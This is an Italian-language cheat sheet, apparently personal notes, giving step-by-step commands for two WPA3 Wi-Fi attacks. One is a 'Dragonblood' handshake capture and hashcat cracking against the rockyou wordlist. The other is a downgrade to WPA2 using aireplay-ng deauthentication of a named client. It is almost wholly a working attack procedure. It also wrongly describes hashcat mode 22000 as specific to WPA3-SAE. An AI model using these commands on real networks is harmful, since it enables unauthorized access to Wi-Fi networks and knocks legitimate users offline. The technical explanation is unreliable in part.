tags: WPA3_Hacking WPA3 DragonBlood WPA2_Downgrade


Attacco Dragonblood

Obiettivo: sfruttare le vulnerabilità dell’handshake SAE (Simultaneous Authentication of Equals), chiamato anche Dragonfly Handshake, per ridurre la sicurezza della chiave e facilitarne il cracking.

 
#Imposta la modalità monitor
 
airmon-ng start wlan0
 
#Usa hcxdumptool per intercettare le richieste di autenticazione SAE:
 
hcxdumptool -i wlan0mon -o wpa3_sae.pcapng -m <BSSID> --enable_status=1
 
#Usa hcxpcapngtool per estrarre l'hash dell'handshake:
 
hcxpcapngtool -o sae_hash.txt wpa3_sae.pcapng
 
#Lancia Hashcat con il modello specifico per WPA3-SAE (hash type 22000):
 
hashcat -m 22000 sae_hash.txt /usr/share/wordlists/rockyou.txt

La procedura di attacco è praticamente identica a quella per l’attacco PMKID (ovviamente sotto al cofano succedono cose molto diverse), l’unica differenza della procedura è l’utilizzo di hashcat che utilizza il codice 22000 al posto del 16800.

Attacco di Downgrade a WPA2

Obiettivo: forzare un dispositivo a connettersi con WPA2 invece di WPA3, rendendo possibile un attacco classico PMKID o 4-way handshake.

 
#Metti la scheda in modalità monitor:
 
airmon-ng start wlan0
 
#Scansiona le reti disponibili:
 
airodump-ng wlan0mon
 
#Identifica il MAC del client connesso alla rete WPA3:
 
airodump-ng -c <canale> --bssid <BSSID> wlan0mon
 
#Esegui un attacco di deautenticazione per scollegarlo dalla rete WPA3:
 
aireplay-ng -0 10 -a <BSSID> -c <MAC_CLIENT> wlan0mon
 

Il client, se il router è configurato per supportare WPA2, si riconnetterà utilizzando WPA2.